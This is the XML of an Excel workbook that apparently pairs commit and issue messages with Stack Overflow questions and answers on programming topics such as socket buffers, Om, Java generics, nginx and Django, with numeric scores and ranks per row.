&lt;p&gt;Iv tried all of ChatGPTs fixes and still cannot get it working so looking for anyone who has experienced something like this before.&lt;/p&gt;
&lt;p&gt;My tests run overnight on headless execution on a jenkins linux server so its essential I get this fixed as Iv currently had to stop them.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE: After further investigation it looks like the headless issue is only occurring on Mac OS. I can see the expected System.out.prints on my jenkins Log for Linux and Windows intellij in headless.
The tests fail on Mac OS Headless only but pass in headfull mode&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C976</t>
  </si>
  <si>
    <t>xrdp has very low bandwidth on high latency connections that can be mitigated via SSH tunnel #2905
https://stackoverflow.com/questions/67113706/why-does-setting-so-sndbuf-and-so-rcvbuf-destroy-performance</t>
  </si>
  <si>
    <t>Clues for what is going on come from the kernel source handle for SO_SNDBUF (and SO_RCVBUF but we'll focus on SO_SNDBUF below).
net/core/sock.c contains implementations for the generic socket operations, including the SOL_SOCKET getsockopt and setsockopt handles.
Examining what happens when we call setsockopt(s, SOL_SOCKET, SO_SNDBUF, ...):
        case SO_SNDBUF:
                /* Don't error on this BSD doesn't and if you think
                 * about it this is right. Otherwise apps have to
                 * play 'guess the biggest size' games. RCVBUF/SNDBUF
                 * are treated in BSD as hints
                 */
                val = min_t(u32, val, sysctl_wmem_max);
set_sndbuf:
                sk-&gt;sk_userlocks |= SOCK_SNDBUF_LOCK;
                sk-&gt;sk_sndbuf = max_t(int, val * 2, SOCK_MIN_SNDBUF);
                /* Wake up sending tasks if we upped the value. */
                sk-&gt;sk_write_space(sk);
                break;
        case SO_SNDBUFFORCE:
                if (!capable(CAP_NET_ADMIN)) {
                        ret = -EPERM;
                        break;
                }
                goto set_sndbuf;
Some interesting things pop out.
First of all, we see that the max possible value is sysctl_wmem_max, a setting which is difficult to pin down within a docker container. We know from the context above that this is likely 212992 (half your max value you retrieved after trying to set 4194304).
Secondly, we see SOCK_SNDBUF_LOCK being set. This setting is in my opinion not well documented in the man pages, but it appears to lock dynamic adjustment of the buffer size.
For example, in the function tcp_should_expand_sndbuf we get:
static bool tcp_should_expand_sndbuf(const struct sock *sk)
{
        const struct tcp_sock *tp = tcp_sk(sk);
        /* If the user specified a specific send buffer setting, do
         * not modify it.
         */
        if (sk-&gt;sk_userlocks &amp; SOCK_SNDBUF_LOCK)
                return false;
...
So what is happening in your code? You attempt to set the max value as you understand it, but it's being truncated to something 10x smaller by the sysctl sysctl_wmem_max. This is then made far worse by the fact that setting this option now locks the buffer to that smaller size. The strange part is that apparently dynamically resizing the buffer doesn't have this same restriction, but can go all the way to the max.
If you look at the first code snip above, you see the SO_SNDBUFFORCE option. This will disregard the sysctl_wmem_max and allow you to set essentially any buffer size provided you have the right permissions.
It turns out processes launched in generic docker containers don't have CAP_NET_ADMIN, so in order to use this socket option, you must run in --privileged mode. However, if you do, and if you force the max size, you will see your benchmark return the same throughput as not setting the option at all and allowing it to grow dynamically to the same size.</t>
  </si>
  <si>
    <t xml:space="preserve">
My first question is, I often read about people using multiple dedicated servers to run their websites, and process queries from users. But how do they exactly do this? I mean, when I enter a domain name, a DNS resolves maps that to an IP address, but I am lost after that.. is there some kind of master/slave architecture there to load balance incoming requests amongst the (potentially) hundreds of servers?
If that's the case, how do the various servers, share data (database for e.g.)? Will they be connected to the same hard disk?
</t>
  </si>
  <si>
    <t>C977</t>
  </si>
  <si>
    <t>Correct a state propagation error down to child components. See: http://stackoverflow.com/questions/26354662/om-app-state-and-application-structure</t>
  </si>
  <si>
    <t>Now that we have reference cursors you could probably do something like this:
(def app-state (atom {:location ""
                      :menuitems [["Pages" "/pages/"]
                                  ["Images" "/images/"]]}))
(defn location []
  (om/ref-cursor (:location (om/root-cursor app-state))))
(defn menu-item-view [item owner]
  (reify
    om/IRender
    (render [this]
      (let [x (location)]
        (dom/li #js {:className (if (= x (last item)) "active" "inactive")}
                (dom/a #js
                       {:onClick (fn [_] (om/update! x (last @item)))}
                       (first item)))))))
(defn menu-view [app owner]
  (reify
    om/IRender
    (render [this]
      (dom/li #js {:className "has-dropdown not-click"}
              (dom/a nil "Menu")
              (apply dom/ul #js {:className "dropdown"}
                     (om/build-all menu-item-view (:menuitems app)))))))
(om/root menu-view app-state
  {:target (. js/document (getElementById "menu"))})
It's just an idea - I haven't actually tested it.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On the facebook developer page, I went to the Graph API Explorer page.
Then, when I clicked on get page access token in User or Page, a modal appeared and the following error message was displayed.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Invalid Scopes: manage_pages, pages_show_list. 
This message is only shown to developers. 
Users of your app will ignore these permissions if present. 
Please read the documentation for valid permissions at: https://developers.facebook.com/docs/facebook-login/permissions
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/UWxb3eED.png?s=500" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/UWxb3eED.png?s=500" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How do I get page access token permissions?
I am also going to contact facebook developer support directly via email.
I couldn`t find the address, but if anyone knows the address, please let me know.
(I am unable to post questions to the facebook developer community due to permissions.)&lt;/p&gt;
&lt;p&gt;Best regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C978</t>
  </si>
  <si>
    <t>Changed IBaseSystem to use a generic component list (https://stackoverflow.com/questions/34696983/java-abstract-or-generic-list-that-all-derived-classes-must-implement#34697151)</t>
  </si>
  <si>
    <t>I think you need something like this
private static abstract class AbstractClass&lt;T&gt; {
    final List&lt;T&gt; objects = new ArrayList&lt;T&gt;();
}
private static class ComponentHolder extends AbstractClass&lt;Component&gt; {
    public void add(final Component c) {
        objects.add(c);
    }
    public Component getComponent(final int index) {
        return objects.get(index);
    }
}
In your example, it would be something like this:
abstract class BaseSystem&lt;T&gt; implements ISystem
{
    protected List&lt;T&gt; _componentList = new ArrayList&lt;T&gt;();
}
class RenderSystem extends BaseSystem&lt;IRenderable&gt;
{
    void Update()
    {
        for (IRenderable r : _componentList)
            r.Render(); // this code is specific to the IRenderable components
    }
    @Override
    public boolean AddToSystem(Component c)
    {
        boolean succesfullyAdded = false;
        if (c instanceof IRenderable)
        {
            succesfullyAdded = true;
            _componentList.add((IRenderable) c);
        } else
            throw new RuntimeException("ERROR - " + c.Name() + " doesn't implement IRenderable interface!");
        return succesfullyAdded;
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">How do you design/architect a scalable application? Any suggestion of books or websites that could help to understand how to scale out applications?
Thanks
</t>
  </si>
  <si>
    <t>C979</t>
  </si>
  <si>
    <t>fix the youtube component typescript by using window[YT] according to https://stackoverflow.com/questions/47601001/onyoutubeiframeapiready-on-angular2-cant-find-name-yt-even-when-defined-on-gl</t>
  </si>
  <si>
    <t>Using window['YT'] instead of YT seems to solve this :
ngOnInit() {
  var player;
  window['onYouTubeIframeAPIReady'] = function() {
    player = new window['YT'].Player('video', {
      events: {
        'onReady': onPlayerReady,
        'onStateChange': onPlayerStateChange
      }
    });
  }
  function onPlayerStateChange(event){
    if (event.data == window['YT'].PlayerState.PAUSED) {
      console.log(player.getCurrentTime());
    }
  }
  function onPlayerReady(event) {
    document.getElementById("pause").addEventListener("click", function() {
      player.pauseVideo();
    });
    document.getElementById("play").addEventListener("click", function() {
      player.playVideo();
    });
  }
  if (!window['YT']){
    var tag = document.createElement('script');
    tag.src = "//www.youtube.com/player_api";
    var firstScriptTag = document.getElementsByTagName('script')[0];
    firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
  }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Server has a endpoint with dynamic values (PathVariables in spring).
How would i handle this location in nginx?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;location /static1/static2/{dynamic1}/{dynamic2}/{dynamic3} {
    if ($request_method = POST ) {
        mirror /mirror
    }
    proxy_pass $scheme://$http_host$uri$is_args$args;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How to propely set this up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C98</t>
  </si>
  <si>
    <t>Rules DP and extracting common abstraction
Extracting common abstract class and implementing the Rules design pattern alongside with CoR.
Check also: https://stackoverflow.com/questions/15913448/writing-clean-code-with-nested-promises/75126266#75126266</t>
  </si>
  <si>
    <t xml:space="preserve">I've been given the task of laying the groundwork of a SOA for my client. The goal is to open up various processes in an end-client independent way and also to make data available offline e.g. for reps visiting customers.
I do have extensive experience with J2EE (Websphere) and web services but I would appreciate advice on how to build up such an SOA. 
Where are the pitfalls? What about security? How finely granulated should services be? etc.
Links to tutorials and book recommendations would also be useful.
Thanks!
</t>
  </si>
  <si>
    <t>You can re-throw an error in the rejection handler to continue rejecting the promise, or you can return a new promise to replace the rejection.
exports.verify = function(data) {
  return postToService(data, "https://production-url.com")
    .fail(function(err) {
      if (err.code === 21007) {
        return postToService(data, "https://sandbox-url.com")
      } else {
        throw err
      }
    });
};</t>
  </si>
  <si>
    <t>C980</t>
  </si>
  <si>
    <t xml:space="preserve">I have a client-server application - wherein the server is essentially an ASP .NET web application and the distributed clients are desktop applications.
The clients need to receive some data from the server - when there is new data for the client. Right now, the way this is done is - the client keeps querying a web service every x minutes (say 2 minutes) and keeps checking if there's new data for the client. 
Ideally, the way it should work is that the desktop app should receive updates as and when they are available, it need not pull from the server; instead the server should be able to push to the client. 
How do I go about doing this - given the architecture of the solution - a web application needs to push data to desktop applications (clients) in the same network (a LAN)?
</t>
  </si>
  <si>
    <t>C981</t>
  </si>
  <si>
    <t>Integrating RDLC WebForms into MVC Via IFrame and Session http://stackoverflow.com/questions/27729599/rdlc-reports-in-asp-net-mvc</t>
  </si>
  <si>
    <t>Background(I know you know this, but for future readers ;-)
The Microsoft ReportViewer Control requires ViewState and WebForms ScriptManagers to work correctly, and as such isn't suited for direct use in MVC Views.
It is however possible to run a WebForms page in an MVC Project - as they run in the same AppDomain, Session state is shared between MVC and WebForms.
In DetailThe ViewReport.aspx page used to render the ReportViewer control in the iframe on the MVC View will need to be a good old fashioned asp.Net web form.
For small data sets, you can fetch the report data in the MVC Controller and then pass this in Session across to the WebForm.
However, for larger data sets, I would recommend that you instead pass the Parameters across to the WebForm in Session (or even via the QueryString, if they aren't sensitive), and then the WebForm code behind would need to fetch the data set and bind it to the ReportViewer.
On the MVC Side, in the MyController parameter post:
    [HttpPost]
    public ActionResult GenerateReport(string param1, int param2)
    {
        // Obviously you apply the parameters as predicates and hit the real database
        Session["ReportData"] = FakeDatabaseData;
        ViewBag.ShowIFrame = true;
        return View();
    }
You can show the IFrame once the ReportParameters have been typed in by the user, on the View, MyController/GenerateReport:
&lt;iframe src='&lt;%= Url.Content("~/OldSkoolAspx/ReportViewer.aspx") %&gt;' width="100%" height="450px"&gt;&lt;/iframe&gt;
Then add a WebForms page /OldSkoolAspx/ReportViewer.aspx to your MVC project. In the code behind ReportViewer.aspx.cs:
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
        {
            var reportDataSource = new ReportDataSource
            {
                // Must match the DataSource in the RDLC
                Name = "SomeReportDataSet",
                Value = Session["ReportData"]
            };
            ReportViewer1.LocalReport.DataSources.Add(reportDataSource);
            ReportViewer1.DataBind();
        }
    }
And in the WebForms ReportViewer.aspx front end, add the control (recommend use the toolbox, so all the requisite references get added to the web.config):
    &lt;rsweb:ReportViewer ID="ReportViewer1" runat="server" Font-Names="Verdana" Font-Size="8pt" WaitMessageFont-Names="Verdana" WaitMessageFont-Size="14pt" Width="476px"&gt;
        &lt;LocalReport ReportPath="MyReport.rdlc"&gt;
        &lt;/LocalReport&gt;
    &lt;/rsweb:ReportViewer&gt;
    &lt;asp:ScriptManager runat="server" ID="SillyPrerequisite"&gt;&lt;/asp:ScriptManager&gt;
There's a lot of moving parts here, so I've uploaded a demo project to GitHub over here
Note that the same technique will also work for Report Server generated reports (i.e. using ReportViewer with .RDL reports). Do however be wary that both RDLC and RDL can be real SessionState hogs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our self-hosted Sentry previously showed de-minified stacktraced using sourcemaps uploaded in build pipeline via sentry-cli. At some point, either on Sentry or Angular update, this stopped working.&lt;/p&gt;
&lt;p&gt;Currently we use Sentry 24.9.0 and Angular 19 (though it hasn't worked since at least Angular 17)&lt;/p&gt;
&lt;p&gt;Observations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Gitlab Pipeline log shows successfully created Sentry release, uploaded sources and sourcemaps&lt;/li&gt;
&lt;li&gt;an issue from the same release shows only minified code&lt;/li&gt;
&lt;li&gt;deployed chunks (referenced in the issue) include debugId (e.g. &lt;a href="https://app.dev.dev.luucy.ch/chunk-3KXWWWJQ.js" rel="nofollow noreferrer"&gt;https://app.dev.dev.luucy.ch/chunk-3KXWWWJQ.js&lt;/a&gt; )&lt;/li&gt;
&lt;li&gt;release referenced in the issue shows 216 sourcemap artifacts including sources and sourcemaps - both paired via debugID (corresponding to the one in deployed chunks)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Suspicious observations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sentry endpoint returns empty list of files associated with the release:
&lt;a href="https://sentry.zensys.cz/api/0/projects/sentry/luucy-fe/releases/fe@3.9.0-0a6cb1d/files/" rel="nofollow noreferrer"&gt;https://sentry.zensys.cz/api/0/projects/sentry/luucy-fe/releases/fe@3.9.0-0a6cb1d/files/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;And so does sentry-cli: &lt;code&gt;sentry-cli files list --release fe@3.9.0-0a6cb1d --log-level=debug&lt;/code&gt; returns empty list&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That's strange, since in Sentry UI the issue, release and sourcemap artifacts seem to be linked properly. It shouldn't even matter if I understand correctly, since the mapping should be done by the debugIds.&lt;/p&gt;
&lt;p&gt;Any ideas what could be the culprit or how to continue with debugging?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/nS1yjGxP.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/nS1yjGxP.png" alt="Issue with minified stacktrace" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/txeoY6yf.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/txeoY6yf.png" alt="Artifacts of the linked release" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C982</t>
  </si>
  <si>
    <t>Changing your own password with deis auth:passwd is easy.
Changing the password for a user who has forgot their password is not.
http://stackoverflow.com/questions/1873806/changing-password-in-django</t>
  </si>
  <si>
    <t>Django comes with a user authentication system. It handles user accounts, groups, permissions and cookie-based user sessions. This document explains how things work.
How to change Django passwords
See the Changing passwords section
Navigation to your project where manage.py file lies
$ python manage.py shell
type below scripts :
You can also use the simple manage.py command:
manage.py changepassword *username*
Just enter the new password twice.
from the Changing passwords section in the docs.
If you have the django.contrib.admin in your INSTALLED_APPS, you can visit: example.com/path-to-admin/password_change/ which will have a form to confirm your old password and enter the new password twice.</t>
  </si>
  <si>
    <t xml:space="preserve">Can anyone please tell what is change request management tool and what is involved when a change request is submitted to this tool?
</t>
  </si>
  <si>
    <t>C983</t>
  </si>
  <si>
    <t>Rename layer package to layers according to https://softwareengineering.stackexchange.com/questions/75919/should-package-names-be-singular-or-plural</t>
  </si>
  <si>
    <t>_Use the plural for packages with homogeneous contents and the singular for packages with heterogeneous contents._
A class is similar to a database relation. A database relation should be named in the singular as its records are considered to be instances of the relation. The function of a relation is to compose a complex record from simple data.
**A package, on the other hand, is not a data abstraction.** It assists with organization of code and resolution of naming conflicts. If a package is named in the singular, it doesn't mean that each member of the package is an instance of the package; it contains related but heterogeneous concepts. If it is named in the plural (as they [often][1] [are][2]), I would expect that the package contains homogeneous concepts.
For example, a type should be named `TaskCollection` instead of `TasksCollection`, as it is a collection containing instances of a `Task`. A package named `com.myproject.task` does not mean that each contained class is an instance of a task. There might be a `TaskHandler`, a `TaskFactory`, etc. A package named `com.myproject.tasks`, however, would contain different types that are all tasks: `TakeOutGarbageTask`, `DoTheDishesTask`, etc.
  [1]: http://download.oracle.com/javase/6/docs/api/java/beans/package-summary.html
  [2]: http://msdn.microsoft.com/en-us/library/system.collections.aspx</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a micro frontend for an app I'm building and I want it to have routing.  After generating my components and creating a &lt;code&gt;routes.ts&lt;/code&gt; file, I realized there is no &lt;code&gt;app.config.ts&lt;/code&gt; file to bootstrap them to the library.  I'm using Angular 19 with standalone components and the only info I can find on the matter is from older versions of angular using &lt;code&gt;NgModule&lt;/code&gt; and &lt;code&gt;RouterModule&lt;/code&gt;.  I came across a github bug report from back in 2019 where someone was asking why they're not getting a prompt for if they want to add routing to their libraries upon generating and one of the maintainers had this to say:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In the current setup, prompting users to configure the router doesn't seem the most ergonomic setup. So we decided to change the prompt configuration until we have a way to provision separate defaults for angular and typescript libs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You can read the report &lt;a href="https://github.com/nrwl/nx/issues/1193" rel="nofollow noreferrer"&gt;here&lt;/a&gt;.  Have they figured that out yet or made a solid decision since to just not allow routing in libraries?  Even at the time that person in the report didn't necessarily say we couldn't add routing anymore, they just removed the option from the prompt configuration which sounds like setting things up manually should still be an option.&lt;/p&gt;
&lt;p&gt;The only thing I could think to try is adding the &lt;code&gt;provideRouter()&lt;/code&gt; method to the &lt;code&gt;providers&lt;/code&gt; array on my main component but that didn't work.  Is there a way to set up routing in a library or should I not build my micro frontends as libraries if they need routing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C99</t>
  </si>
  <si>
    <t>Design/implement class to record performance measurements #14
Basically what we want is a class that exists during the running of the program (so it gets initialized in the beginning of the program). The class itself will act as a timer and can measure the latency of workloads. I feel like we would want a helper class here (1 class that collects latency results and 1 class that represents a single latency result)
So in our program, we might have something like this:
int main(void) {
   LatencyTimer timer();
   ...
   LatencyMeasurement measurement(workload_id); // Starts timer as soon as objected is instantiated
   ... // Workload starts and completes here
   measurement.stop();
   timer.add(measurement);
   ...
   timer.save_result("performance_data"); // will save with subdirectories inside performance_data/
   return 0;
}
Things to do:
I like this precise time measurement option for precisely measuring the latency.
https://stackoverflow.com/questions/14337278/precise-time-measurement</t>
  </si>
  <si>
    <t>C++11 introduced the chrono API, you can use to get nanoseconds :
auto begin = std::chrono::high_resolution_clock::now();
// code to benchmark
auto end = std::chrono::high_resolution_clock::now();
std::cout &lt;&lt; std::chrono::duration_cast&lt;std::chrono::nanoseconds&gt;(end-begin).count() &lt;&lt; "ns" &lt;&lt; std::endl;
For a more relevant value it is good to run the function several times and compute the average :
auto begin = std::chrono::high_resolution_clock::now();
uint32_t iterations = 10000;
for(uint32_t i = 0; i &lt; iterations; ++i)
{
    // code to benchmark
}
auto end = std::chrono::high_resolution_clock::now();
auto duration = std::chrono::duration_cast&lt;std::chrono::nanoseconds&gt;(end-begin).count();
std::cout &lt;&lt; duration &lt;&lt; "ns total, average : " &lt;&lt; duration / iterations &lt;&lt; "ns." &lt;&lt; std::endl;
But remember the for loop and assigning begin and end var use some CPU time too.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work with emails semi-regularly, so I am familiar with a lot of the common issues, such as Outlook in general and some Gmail stuff. However I am having trouble getting some text to align properly in the Gmail app. On Android 13, it is rendered correctly:
&lt;a href="https://i.sstatic.net/WxmKXRmw.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/WxmKXRmw.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Anything before 13 looks like this (this screenshot specifically is Android 8):
&lt;a href="https://i.sstatic.net/5oZtEnHO.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/5oZtEnHO.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The text is shifted upwards. I'm not sure if it is ignoring padding, line-height, or it's something else. It's small and ultimately not a &lt;em&gt;huge&lt;/em&gt; deal, but it's bugging me.&lt;/p&gt;
&lt;p&gt;Each text line is a table within one larger table (that I will omit since it contains everything else in the email). I'll provide a snippet of one of those tables:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;td&amp;gt;
    &amp;lt;table
        role=&amp;quot;presentation&amp;quot;
        class=&amp;quot;main&amp;quot;
        width=&amp;quot;100%&amp;quot;
        cellpadding=&amp;quot;0&amp;quot;
        cellspacing=&amp;quot;0&amp;quot;
        border=&amp;quot;0&amp;quot;
    &amp;gt;
        &amp;lt;tbody&amp;gt;
            &amp;lt;tr&amp;gt;
                &amp;lt;td class=&amp;quot;numerical-image&amp;quot; width=&amp;quot;200px&amp;quot; align=&amp;quot;left&amp;quot;&amp;gt;
                    &amp;amp;nbsp;&amp;lt;img
                        style=&amp;quot;width: 36px !important&amp;quot;
                        width=&amp;quot;36&amp;quot;
                        src=&amp;quot;./step-1.png&amp;quot;
                    /&amp;gt;
                &amp;lt;/td&amp;gt;
                &amp;lt;td
                    width=&amp;quot;100%&amp;quot;
                    align=&amp;quot;left&amp;quot;
                    style=&amp;quot;
                        text-align: left;
                        font-size: 16px;
                        padding-top: 20px;
                        margin-top: 20px;
                        padding-left: 16px;
                        padding-bottom: 20px;
                        line-height: 18px;
                    &amp;quot;
                &amp;gt;
                    &amp;lt;font face=&amp;quot;arial, helvetica, sans-serif&amp;quot; color=&amp;quot;#000&amp;quot;&amp;gt;
                        Text line one
                    &amp;lt;/font&amp;gt;
                &amp;lt;/td&amp;gt;
            &amp;lt;/tr&amp;gt;
        &amp;lt;/tbody&amp;gt;
    &amp;lt;/table&amp;gt;
&amp;lt;/td&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I attempted to add &lt;code&gt;margin-top: 20px; line-height: 18px;&lt;/code&gt; to fix it but it didn't change anything. These sections show correctly in other email clients, its just Gmail giving me problems.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it broken? Well, sort of. I tried various ideas and couldn't get the code in your jsFiddle to work. Looking at this MSDN Blog post, we find that postMessage only works between IFrames in older versions of IE, which has yet to be fixed for IE 11.
That article links to a demo of the problem. There are a couple of workarounds that involve calling scripts on the window.opener. However, as that blog states (emphasis mine):
Unfortunately, this workaround often isn't possible, because same-origin-policy dictates that the popup window and the window.opener page must be from the same origin in order to call each other's script functions.
So it looks like the only way to do this is something like this, where the child is hosted in an IFrame in the parent. I have created a similar demo here, based on the code in yours. It's pretty simple, but posts a message to the contentWindow of the IFrame, which in turn responds.
I see the recommendation to use MessageChannel instead, but I also wonder if using Web Workers might be worth investigating, though their use would of course depend on the nature of your task. There is also the answer to this question, where the IFrame approach was used, but a jQuery UI dialog was used to display it - I would imagine you could do the same thing with modals in Bootstrap if you prefer that.
For reference:
HTML
&lt;iframe id="iframe" src="http://jsbin.com/iLapokOS/7/"&gt;&lt;/iframe&gt;
&lt;div id="log"&gt;&lt;/div&gt;
&lt;button id="post-message-button"&gt;Post message to window&lt;/button&gt;
Parent script
var wnd;
$(document).ready(function() {
    $('#log').append('listening...');
    wnd = $('#iframe')[0].contentWindow;
    window.addEventListener('message', function(e){
      $('#log').append('&lt;br/&gt;Received message: ' + JSON.stringify(e.data));
    }, false);
    $('#post-message-button').click(function() {
        if(!wnd){
            return;
        }
        $('#log').append('&lt;br/&gt;sending...');
        wnd.postMessage('Hello?', 'http://jsbin.com');
    });
});
Child HTML and JS
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;script src="http://code.jquery.com/jquery-latest.js"&gt;&lt;/script&gt;
&lt;meta charset=utf-8 /&gt;
&lt;title&gt;JS Bin&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;script&gt;
    $(document).ready(function() {
      window.addEventListener("message", function(e){
        $('body').append('&lt;br/&gt;Origin: ' + e.origin);        
        $('body').append("&lt;br/&gt;Received message: " + JSON.stringify(e.data));
        e.source.postMessage('Hello yourself', e.origin);
      }, false);
    });
  &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>solution_id</t>
  </si>
  <si>
    <t>problem_text</t>
  </si>
  <si>
    <t>solution_text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</si>
</sst>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10"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="10.6640625" customWidth="1"/>
    <col min="2" max="2" width="13.77734375" style="2" customWidth="1"/>
    <col min="3" max="3" width="10.6640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="46" customWidth="1"/>
    <col min="5" max="5" width="11.5546875" customWidth="1"/>
    <col min="6" max="6" width="11.21875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>3881</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>3880</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3882</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>3</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C2">
        <v>32834026</v>
      </c>
      <c r="D2" t="s">
        <v>5</v>
      </c>
      <c r="E2">
        <v>29.536441802978519</v>
      </c>
      <c r="F2">
        <v>1</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>3</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C3">
        <v>32834026</v>
      </c>
      <c r="D3" t="s">
        <v>6</v>
      </c>
      <c r="E3">
        <v>9.3085842132568359</v>
      </c>
      <c r="F3">
        <v>2</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>7</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C4">
        <v>23803744</v>
      </c>
      <c r="D4" t="s">
        <v>9</v>
      </c>
      <c r="E4">
        <v>25.82783317565918</v>
      </c>
      <c r="F4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>7</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C5">
        <v>23803744</v>
      </c>
      <c r="D5" t="s">
        <v>10</v>
      </c>
      <c r="E5">
        <v>2.9959439416415989E-4</v>
      </c>
      <c r="F5">
        <v>2</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>11</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>12</v>
      </c>
      <c r="C6">
        <v>50062174</v>
      </c>
      <c r="D6" t="s">
        <v>13</v>
      </c>
      <c r="E6">
        <v>19.674013137817379</v>
      </c>
      <c r="F6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>11</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>12</v>
      </c>
      <c r="C7">
        <v>9440211</v>
      </c>
      <c r="D7" t="s">
        <v>14</v>
      </c>
      <c r="E7">
        <v>5.7882213592529297</v>
      </c>
      <c r="F7">
        <v>2</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>15</v>
      </c>
      <c r="B8" t="s">
        <v>16</v>
      </c>
      <c r="C8">
        <f>C7+1253</f>
        <v>9441464</v>
      </c>
      <c r="D8" t="s">
        <v>17</v>
      </c>
      <c r="E8">
        <v>20.828750610351559</v>
      </c>
      <c r="F8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>15</v>
      </c>
      <c r="B9" t="s">
        <v>16</v>
      </c>
      <c r="C9">
        <v>9440212</v>
      </c>
      <c r="D9" t="s">
        <v>18</v>
      </c>
      <c r="E9">
        <v>17.149066925048832</v>
      </c>
      <c r="F9">
        <v>2</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>15</v>
      </c>
      <c r="B10" t="s">
        <v>16</v>
      </c>
      <c r="C10">
        <f t="shared" ref="C10:C73" si="0">C9+1253</f>
        <v>9441465</v>
      </c>
      <c r="D10" t="s">
        <v>19</v>
      </c>
      <c r="E10">
        <v>15.571487426757811</v>
      </c>
      <c r="F10">
        <v>3</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>20</v>
      </c>
      <c r="B11" t="s">
        <v>21</v>
      </c>
      <c r="C11">
        <f t="shared" si="0"/>
